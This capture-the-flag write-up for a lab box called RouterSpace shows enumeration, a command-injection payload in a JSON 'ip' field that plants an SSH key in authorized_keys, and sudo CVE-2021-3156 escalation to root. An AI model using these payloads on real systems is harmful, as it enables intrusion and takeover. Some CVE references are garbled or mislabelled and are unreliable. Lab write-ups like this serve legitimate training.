Enum

nmap

TCP

# Nmap 7.92 scan initiated Mon Apr  4 08:25:03 2022 as: nmap -sCV -oN nmap_tcp 10.129.227.47
Nmap scan report for 10.129.227.47
Host is up (0.031s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     (protocol 2.0)
| ssh-hostkey: 
|   3072 f4:e4:c8:0a:a6:af:66:93:af:69:5a:a9:bc:75:f9:0c (RSA)
|   256 7f:05:cd:8c:42:7b:a9:4a:b2:e6:35:2c:c4:59:78:02 (ECDSA)
|_  256 2f:d7:a8:8b:be:2d:10:b0:c9:b4:29:52:a8:94:24:78 (ED25519)
| fingerprint-strings: 
|   NULL: 
|_    SSH-2.0-RouterSpace Packet Filtering V1
80/tcp open  http
|_http-trane-info: Problem with XML parsing of /evox/about
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 200 OK
|     X-Powered-By: RouterSpace
|     X-Cdn: RouterSpace-31847
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 59
|     ETag: W/"3b-w4B/eVG5IpKygPyJlj8C71OlB2g"
|     Date: Mon, 04 Apr 2022 07:25:15 GMT
|     Connection: close
|     Suspicious activity detected !!! {RequestID: 0W3 8 }
|   GetRequest: 
|     HTTP/1.1 200 OK
|     X-Powered-By: RouterSpace
|     X-Cdn: RouterSpace-91367
|     Accept-Ranges: bytes
|     Cache-Control: public, max-age=0
|     Last-Modified: Mon, 22 Nov 2021 11:33:57 GMT
|     ETag: W/"652c-17d476c9285"
|     Content-Type: text/html; charset=UTF-8
|     Content-Length: 25900
|     Date: Mon, 04 Apr 2022 07:25:15 GMT
|     Connection: close
|     <!doctype html>
|     <html class="no-js" lang="zxx">
|     <head>
|     <meta charset="utf-8">
|     <meta http-equiv="x-ua-compatible" content="ie=edge">
|     <title>RouterSpace</title>
|     <meta name="description" content="">
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <link rel="stylesheet" href="css/bootstrap.min.css">
|     <link rel="stylesheet" href="css/owl.carousel.min.css">
|     <link rel="stylesheet" href="css/magnific-popup.css">
|     <link rel="stylesheet" href="css/font-awesome.min.css">
|     <link rel="stylesheet" href="css/themify-icons.css">
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     X-Powered-By: RouterSpace
|     X-Cdn: RouterSpace-16142
|     Allow: GET,HEAD,POST
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 13
|     ETag: W/"d-bMedpZYGrVt1nR4x+qdNZ2GqyRo"
|     Date: Mon, 04 Apr 2022 07:25:15 GMT
|     Connection: close
|     GET,HEAD,POST
|   RTSPRequest, X11Probe: 
|     HTTP/1.1 400 Bad Request
|_    Connection: close
|_http-title: RouterSpace
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port22-TCP:V=7.92%I=7%D=4/4%Time=624A9D5B%P=x86_64-pc-linux-gnu%r(NULL,
SF:29,"SSH-2\.0-RouterSpace\x20Packet\x20Filtering\x20V1\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port80-TCP:V=7.92%I=7%D=4/4%Time=624A9D5B%P=x86_64-pc-linux-gnu%r(GetRe
SF:quest,31BA,"HTTP/1\.1\x20200\x20OK\r\nX-Powered-By:\x20RouterSpace\r\nX
SF:-Cdn:\x20RouterSpace-91367\r\nAccept-Ranges:\x20bytes\r\nCache-Control:
SF:\x20public,\x20max-age=0\r\nLast-Modified:\x20Mon,\x2022\x20Nov\x202021
SF:\x2011:33:57\x20GMT\r\nETag:\x20W/\"652c-17d476c9285\"\r\nContent-Type:
SF:\x20text/html;\x20charset=UTF-8\r\nContent-Length:\x2025900\r\nDate:\x2
SF:0Mon,\x2004\x20Apr\x202022\x2007:25:15\x20GMT\r\nConnection:\x20close\r
SF:\n\r\n<!doctype\x20html>\n<html\x20class=\"no-js\"\x20lang=\"zxx\">\n<h
SF:ead>\n\x20\x20\x20\x20<meta\x20charset=\"utf-8\">\n\x20\x20\x20\x20<met
SF:a\x20http-equiv=\"x-ua-compatible\"\x20content=\"ie=edge\">\n\x20\x20\x
SF:20\x20<title>RouterSpace</title>\n\x20\x20\x20\x20<meta\x20name=\"descr
SF:iption\"\x20content=\"\">\n\x20\x20\x20\x20<meta\x20name=\"viewport\"\x
SF:20content=\"width=device-width,\x20initial-scale=1\">\n\n\x20\x20\x20\x
SF:20<link\x20rel=\"stylesheet\"\x20href=\"css/bootstrap\.min\.css\">\n\x2
SF:0\x20\x20\x20<link\x20rel=\"stylesheet\"\x20href=\"css/owl\.carousel\.m
SF:in\.css\">\n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20href=\"css/m
SF:agnific-popup\.css\">\n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20h
SF:ref=\"css/font-awesome\.min\.css\">\n\x20\x20\x20\x20<link\x20rel=\"sty
SF:lesheet\"\x20href=\"css/themify-icons\.css\">\n\x20")%r(HTTPOptions,108
SF:,"HTTP/1\.1\x20200\x20OK\r\nX-Powered-By:\x20RouterSpace\r\nX-Cdn:\x20R
SF:outerSpace-16142\r\nAllow:\x20GET,HEAD,POST\r\nContent-Type:\x20text/ht
SF:ml;\x20charset=utf-8\r\nContent-Length:\x2013\r\nETag:\x20W/\"d-bMedpZY
SF:GrVt1nR4x\+qdNZ2GqyRo\"\r\nDate:\x20Mon,\x2004\x20Apr\x202022\x2007:25:
SF:15\x20GMT\r\nConnection:\x20close\r\n\r\nGET,HEAD,POST")%r(RTSPRequest,
SF:2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20close\r\n\r\n"
SF:)%r(X11Probe,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20c
SF:lose\r\n\r\n")%r(FourOhFourRequest,121,"HTTP/1\.1\x20200\x20OK\r\nX-Pow
SF:ered-By:\x20RouterSpace\r\nX-Cdn:\x20RouterSpace-31847\r\nContent-Type:
SF:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x2059\r\nETag:\x20W/
SF:\"3b-w4B/eVG5IpKygPyJlj8C71OlB2g\"\r\nDate:\x20Mon,\x2004\x20Apr\x20202
SF:2\x2007:25:15\x20GMT\r\nConnection:\x20close\r\n\r\nSuspicious\x20activ
SF:ity\x20detected\x20!!!\x20{RequestID:\x20\x20\x20\x200W3\x208\x20\x20}\
SF:n\n\n");

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Apr  4 08:25:23 2022 -- 1 IP address (1 host up) scanned in 19.71 seconds

If we visit the webpage, we are able to download RouterSpace.apk.

To run the apk on linux we can use Anbox. There is a good blogpost on how to install the tool and get it working.

After we have followed the steps we install RouterSploit.apk.

$ adb install RouterSpace.apk                                                         
Performing Streamed Install
Success

After command has been executed we see the app in Anbox

If we start the app we have the option the press “Check Status”

If we do so, the app complains about not having internet connectivity.

To configure a proxy with Anbox we run

adb shell settings put global http_proxy 192.168.250.1:8080

Where 192.168.250.1 is the interface of Anbox. Next we configure burp to listen on 192.168.250.1:8080.

Now we press “Check Status” again and we are able to capture the request

We add routerspace.htb to /etc/hosts and send the request to repeater.

Since the endpoint is accepting an IP address as input, we can make a qualified guess that it is probably being sent to ping or something similar.

By modying the input parameter we can confirm our assumption

Next we add our ssh key so that we can ssh in to the box

POST /api/v4/monitoring/router/dev/check/deviceAccess HTTP/1.1
accept: application/json, text/plain, */*
user-agent: RouterSpaceAgent
Content-Type: application/json
Content-Length: 614
Host: routerspace.htb
Connection: close
Accept-Encoding: gzip, deflate


{"ip":"; echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC9Y8bELgxXPdypgbEH0uYR3bnXd8UVRPWjEzgQw2j00mpbzGFmf5ggRFD5fA8Bm15rN299hshGoiWAz43L2HcTki65p93CFEni6byfzgDeV1HCZQY4VWQg165XhKSVF9zGjkrAkPrnJadeg2fS0wxQJRVJ0+8X6++PacdBGnJb+3HOmdARKz8kLdk8xaGFkhO9TM+rCaipftXH2Jn2g4KT9G4hjtXVRvyyIprqcP3ggQVGisaApmNmvAHBWYPhotAgYvuRSUcL6iX8BfHIyfc5v2OZVMs6bl7+V5ZYXfR7DuGsIGzPekmvWKtG8lmUnXFUmCZoe87JtmA5IIdkmMScsiW4z8IutXRCccxFTRS/WuKqqJ6B8MTlPGj0s+Y+e0DtGFmyJUcdV58N5yhdtWb8af2UySWwTn8WHOEPDLXdAhutL0Jr0epTw7gB2CO94MsjX/CVLRnCHtX5mfGXDc3C8ZSlUGvqxB2eFjE/MGPenLyezZz68JJNufIMh6pDKMc= bob@kali' >  /home/paul/.ssh/authorized_keys"}

We run linpeas to perform some enumeration, which reveals that the box is vulnerable to CVE-2021-.

After trying some PoCs for 3CVE-2021-3560 (pwnkit) without success, I google to see if there are any sudo exploits, which leads me to CVE-2021-3156.

We perform the suggested vuln check by overflowing sudoedit.

paul@routerspace:/tmp$ sudoedit -s '\' `perl -e 'print "A" x 65536'`                                                                                                                         
malloc(): corrupted top size                                                                                                                                                                 
Aborted (core dumped)      

The segfault suggests that this version is vulnerable.

We use exploit_nss.py from this repo to achieve root.

paul@routerspace:/tmp$ python3 exploit.py 
# whoami
root
#